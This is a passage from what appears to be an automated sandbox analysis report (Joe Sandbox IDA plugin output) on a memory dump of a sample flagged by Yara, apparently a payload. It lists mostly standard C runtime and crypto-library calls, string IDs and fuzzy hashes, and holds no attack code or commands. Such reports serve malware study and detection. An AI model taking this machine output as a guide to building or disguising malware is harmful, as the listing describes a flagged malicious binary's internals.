                                                                                                                                                                        • _malloc.LIBCMT ref: 0031076D
                                                                                                                                                                        • _free.LIBCMT ref: 003107B6
                                                                                                                                                                          • Part of subcall function 003042FD: IsProcessorFeaturePresent.KERNEL32(00000017,003042D1,00000000,?,?,?,?,?,003042DE,00000000,00000000,00000000,00000000,00000000,0030981C), ref: 003042FF
                                                                                                                                                                        • _free.LIBCMT ref: 003107AF
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00305141
                                                                                                                                                                          • Part of subcall function 00307D6C: EncodePointer.KERNEL32(00000000,?,00305146,00303FFE,003E7990,00000014), ref: 00307D6F
                                                                                                                                                                          • Part of subcall function 00307D6C: __initp_misc_winsig.LIBCMT ref: 00307D8A
                                                                                                                                                                          • Part of subcall function 00307D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003126B3
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003126C7
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003126DA
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003126ED
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00312700
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00312713
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00312726
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312739
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031274C
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031275F
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312772
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312785
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312798
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003127AB
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003127BE
                                                                                                                                                                          • Part of subcall function 00307D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003127D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00305146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 0030514F
                                                                                                                                                                          • Part of subcall function 003051B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00305154,00303FFE,003E7990,00000014), ref: 00308B62
                                                                                                                                                                          • Part of subcall function 003051B7: _free.LIBCMT ref: 00308B69
                                                                                                                                                                          • Part of subcall function 003051B7: DeleteCriticalSection.KERNEL32(003EAC00,?,?,00305154,00303FFE,003E7990,00000014), ref: 00308B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00305174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00305196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0030519D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: 2606c96273241765938f9f889f0057c1de39fb977943bc9d2300c76ce0f10efa
                                                                                                                                                                        • Instruction ID: 16e491cf783ceeb03740f3061794ed58833569f0074d85d294d07ae8f253da8e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2606c96273241765938f9f889f0057c1de39fb977943bc9d2300c76ce0f10efa
                                                                                                                                                                        • Instruction Fuzzy Hash: 47F06D3255BB511EFA3F7778AC27B9B2A99DB01730F220619F0A4DD1D1EF2098424951
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 0030594A
                                                                                                                                                                          • Part of subcall function 00308AF7: __mtinitlocknum.LIBCMT ref: 00308B09
                                                                                                                                                                          • Part of subcall function 00308AF7: __amsg_exit.LIBCMT ref: 00308B15
                                                                                                                                                                          • Part of subcall function 00308AF7: EnterCriticalSection.KERNEL32(?,?,003050D7,0000000D), ref: 00308B22
                                                                                                                                                                        • _free.LIBCMT ref: 00305970
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00305989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00305998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 003059B1
                                                                                                                                                                        • _free.LIBCMT ref: 003059C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 1276989447a0791eba20631077b2b344af3826525141928255d2dd8f27529079
                                                                                                                                                                        • Instruction ID: b0dc166a70fba19b2ab13883defe493fea607b00bd6af7f873b3c82d5444e8b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 1276989447a0791eba20631077b2b344af3826525141928255d2dd8f27529079
                                                                                                                                                                        • Instruction Fuzzy Hash: 0501AD31503B04D6EB3BABA8D866B1F72A09F01731F21865EE0A45A0D1CFB09980CE51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF$Ul3
                                                                                                                                                                        • API String ID: 1302938615-1236949915
                                                                                                                                                                        • Opcode ID: a9b9c2f3bcb302e88f801591fb5af8191e46f7283a08fc8509df71fc5fd3ff44
                                                                                                                                                                        • Instruction ID: 7e44b5b9d753b56482415e6e4e8067378cc2eac3939520fb4c674d8696df100b
                                                                                                                                                                        • Opcode Fuzzy Hash: a9b9c2f3bcb302e88f801591fb5af8191e46f7283a08fc8509df71fc5fd3ff44
                                                                                                                                                                        • Instruction Fuzzy Hash: C381ACB1A0C7519FD722CF29C881A2BBBE5BFC9744F15091DF989A7252D330ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 003307C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: f600b5016774424dce6f819119cf9549f11e873fe8710df72a4616d100d853b7
                                                                                                                                                                        • Instruction ID: f8b99194a50c228b2b0474896f40b408f04b16e090591996c02a89c5b6382046
                                                                                                                                                                        • Opcode Fuzzy Hash: f600b5016774424dce6f819119cf9549f11e873fe8710df72a4616d100d853b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 85412871A043059FD725EE24CC92BAFB3D8EF85748F40482EF585A7241E671E908CBE2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$g94
                                                                                                                                                                        • API String ID: 2102423945-1741298942
                                                                                                                                                                        • Opcode ID: 098fa258f716964991cf1fa61304d3dad753ff81a626102a8de5d36ea7ae7e54
                                                                                                                                                                        • Instruction ID: dc17c662aaa910b2bb9c1beea7b5bec7bafff45f852d6b1b090c2651d46f6515
                                                                                                                                                                        • Opcode Fuzzy Hash: 098fa258f716964991cf1fa61304d3dad753ff81a626102a8de5d36ea7ae7e54
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D2123B6B007217FE215666CFC82F56F399EB84B14F004029F258DB2C1E2A0EC10C3D5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 003A5D3D
                                                                                                                                                                          • Part of subcall function 0030501F: GetLastError.KERNEL32(?,?,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC,000000FF), ref: 00305021
                                                                                                                                                                          • Part of subcall function 0030501F: __calloc_crt.LIBCMT ref: 00305042
                                                                                                                                                                          • Part of subcall function 0030501F: __initptd.LIBCMT ref: 00305064
                                                                                                                                                                          • Part of subcall function 0030501F: GetCurrentThreadId.KERNEL32 ref: 0030506B
                                                                                                                                                                          • Part of subcall function 0030501F: SetLastError.KERNEL32(00000000,?,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC,000000FF), ref: 00305083
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 003A5D60
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 003A5D7E
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 003A5DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003A5D48, 003A5D6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                        • Opcode ID: 0e9aebaaec98feef76dab53e9a749cb1fa772d648512cf7f65fc9eddf5d48993
                                                                                                                                                                        • Instruction ID: 91bd6a73519b2e1b30a33a23c698046436dfc384137dc753e454ebfff79a0a8b
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e9aebaaec98feef76dab53e9a749cb1fa772d648512cf7f65fc9eddf5d48993
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B11E772602E156BEB237B65AC05AAF739CEF16760F110826FE05DE681E621DD0142A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                        • Opcode ID: 7007043cfcec50146473c21c0b6322bfc9b336b3b3a76f9bfcdbf8ab7eeffecb
                                                                                                                                                                        • Instruction ID: 9454ffa25f4d3ddad69935dd952b13e883ff12d8678db6d58ddb3f3d5bf4534a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7007043cfcec50146473c21c0b6322bfc9b336b3b3a76f9bfcdbf8ab7eeffecb
                                                                                                                                                                        • Instruction Fuzzy Hash: 272157B2A043113BE722A9266C42FBB77D99FC1798F054618FE50AF1C2DA21ED0543A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00321726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00321734
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 003217BF
                                                                                                                                                                        • __lock.LIBCMT ref: 003217D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 003217DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: 97274d1ee43b687a79e5c7533eded4f80990259db42fddc44148853551dbfcce
                                                                                                                                                                        • Instruction ID: 696e43bc12e99dc649d23618dd113f645aaaeb1841af17edac4ae3a581385c16
                                                                                                                                                                        • Opcode Fuzzy Hash: 97274d1ee43b687a79e5c7533eded4f80990259db42fddc44148853551dbfcce
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31F932A02235AADB236BACAD01B9F76985FA5B20F150525F914DF1C1DF75C90087A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 0031B70B
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _free.LIBCMT ref: 0031B71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: 2a18fc3a0d9646f047bd2b68ae150b92984e20bff4fbb5bf75655ab88f3797b3
                                                                                                                                                                        • Instruction ID: c9b6ec89818a90eecae5fe9cdd3fe292625cdfa295356ba5f7e67fd76a0ffea6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a18fc3a0d9646f047bd2b68ae150b92984e20bff4fbb5bf75655ab88f3797b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D11C632516615ABCB2B2F74EC54BAE7B9CAF4D360F110525F8559E1D2DB3098808A90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 002FF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 002FF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: cc5d19c4e475b5d4ed13b5edecc748b4f85c5ba2063eb250a094548b6979936b
                                                                                                                                                                        • Instruction ID: d1381016a291b563224c558ea34ef9ac4ddd6cd4c713bc4c6c97285fdbab28d8
                                                                                                                                                                        • Opcode Fuzzy Hash: cc5d19c4e475b5d4ed13b5edecc748b4f85c5ba2063eb250a094548b6979936b
                                                                                                                                                                        • Instruction Fuzzy Hash: E501DB3579030D7AEB329B54EC46FB6776CEB44B00F104025FB00AB1D2D7B5A505CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 002FE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 002FE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: d974d206a0bf32f3335fc12c4e67915c9156c3fdc75ba8dfb422d6966d32664f
                                                                                                                                                                        • Instruction ID: d4d787d56affd7f5fe60a58abe404541d94f8c806ff08b9320af51eab7427cc6
                                                                                                                                                                        • Opcode Fuzzy Hash: d974d206a0bf32f3335fc12c4e67915c9156c3fdc75ba8dfb422d6966d32664f
                                                                                                                                                                        • Instruction Fuzzy Hash: DB01DB3575030D7AEF229B50DC46FB67B6CEB44B04F544411FB00AB1E1D6F5A505C794
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 002FFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 002FFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction ID: 6761ff541590db6558fb184c13c49f9c0ed71cef3a06bbf76c3dbd77795a8d95
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction Fuzzy Hash: E701D631B9030DBBEF219B50DD4AFA67B6CAB45B40F104021FB04AE1C1D7E5A8048AA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 002FFE03
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFE21
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FFE2B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFE39
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 002FFE44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
